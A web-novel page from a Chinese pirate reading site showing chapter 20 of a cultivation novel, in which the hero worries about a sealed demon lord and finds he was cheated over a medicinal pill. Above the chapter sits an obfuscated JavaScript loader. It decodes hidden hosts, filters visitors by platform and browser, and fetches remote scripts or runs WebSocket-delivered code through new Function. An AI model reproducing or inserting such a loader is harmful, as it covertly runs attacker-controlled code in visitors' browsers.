笔趣阁

字:
关灯 护眼
笔趣阁 > 我的武学自己会修炼 > 第二十章 骗人可以,但不能言而无信!
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE1Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x73\x49\x42\x6b\x73\x42\x45\x58\x66\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NramRrZnMucW9ybb3NtYWxsLmNvbbQ==','d3NzOi8vd3MMuc3luZ2d5LmNvbTo5MMDkw',window,document,['b','M']);}:function(){};

第二十章 骗人可以,但不能言而无信!

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
所谓魔主,其实是对魔修之人到达一定境界之后的统称。
  魔与妖不同,妖是兽,而魔的本质其实脱胎于人。
  他们的修炼境界与寻常武者相同。
  但在冲刺化念阶段,会采取极端方法,舍弃肉身,修炼元胎。
  所谓,一念成魔,无外如是!
  这个过程极其凶险,对外界的危害也极大,为天地所不容。
  很少有魔修能够熬过来。
  稍有差池,肉身尽毁不说,神志也会被磨灭。
  最终成为一道游离于世间的魔念。
  误入歧途的武者终归是少数,能修成魔主的,就更少。
  但魔主修炼元胎,力量无穷,且不会被肉身所累,几乎碾压同等武者。
  古往今来,倒也有不少极端渴望力量者,前仆后继。
  杨易不清楚被镇压在断崖下的魔主究竟是何境界。
  但至少是化念!
  若魔气泄露是魔主复苏的前兆。
  栖霞宗岂不是危在旦夕?
  要知道,内院的掌院也仅仅是化念境界!
  宗主、个别长老的层次或许更高。
  但也难说这位魔主就止步于化念。
  所以。
  当杨易看到这条消息的时候,心脏狂跳!
  立刻就琢磨着如何将此事传播出去。
  早做准备,做好防范,才能让危险降至最小。
  其实事情传播出去不难。
  难就难在悄无声息。
  他可不想被逼问为何知道魔气外泄。
  “哎,本以为栖霞宗是屹立不倒的大树,没想到这棵大树的根基,也不牢固。”
  大山中群妖躁动,现在又有魔气外泄。
  杨易愈发觉得危险在迫近。
  耐着性子又熬了一天。
  临近傍晚。
  经过一天苦修的杨易没有立刻离开徐孟华的居所。
  而是悄摸摸拿出一个木盒。
  这绝对没有信不过庄呈露的意思。
  只是杨易的药理知识太浅薄,服用之前鉴定一下比较好。
  而在这栖霞宗,杨易信得过的,且有眼界的,也便只有这位徐管事了。
  “这是蟒血丹,炼血层次服用,有助于气血调理,很适合现在的你。”
  徐孟华颇有些感慨。
  这就是有钱人家的孩子么?
  看这蟒血丹的色泽,已经算是上品。
  若放到市场上售卖,价格绝对在三千两以上,而且还不一定能买到。
  “徐管事,您确定这是蟒血丹?”
  杨易表现得不像徐孟华想象得那么快乐。
  “我自然不会看错。”
  徐孟华神色淡然。
  “早些时候,我听师兄弟们说起甚么龙血丹……”
  杨易故意引起话题。
  “龙血丹?那种丹药炼制繁琐,虽说效果比起蟒血丹要强,但很少有炼丹师愿意去炼。”徐孟华笑了笑。
  这下,杨易总算听懂了。
  合着这蟒血丹是龙血丹的低配版本。
  该死,又被骗了!
  杨易愤懑。
  做不到就别承诺啊。
  承诺了又给个廉价版本算咋回事?
  这女人真的很有问题,以后还是少打交道为好。
  他在心中打定主意。
  “杨易,你莫不是被人坑骗了,用龙血丹的价钱买了蟒血丹?”
  徐孟华微微皱起眉头。
  这种事在那些涉世不深,又很有钱的弟子身上很常见。
  “没。”
  杨易笑笑。
  旋即行礼告辞。
  事情到了这一步,找庄呈露讨说法是没戏了。
『加入书签,方便阅读』
热门推荐
长夜余火 快看那个大佬 有请小师叔 在港综成为传说 旧日之箓 诡异世界生存手册 诡秘之主 奥术神座 灭运图录 武道宗师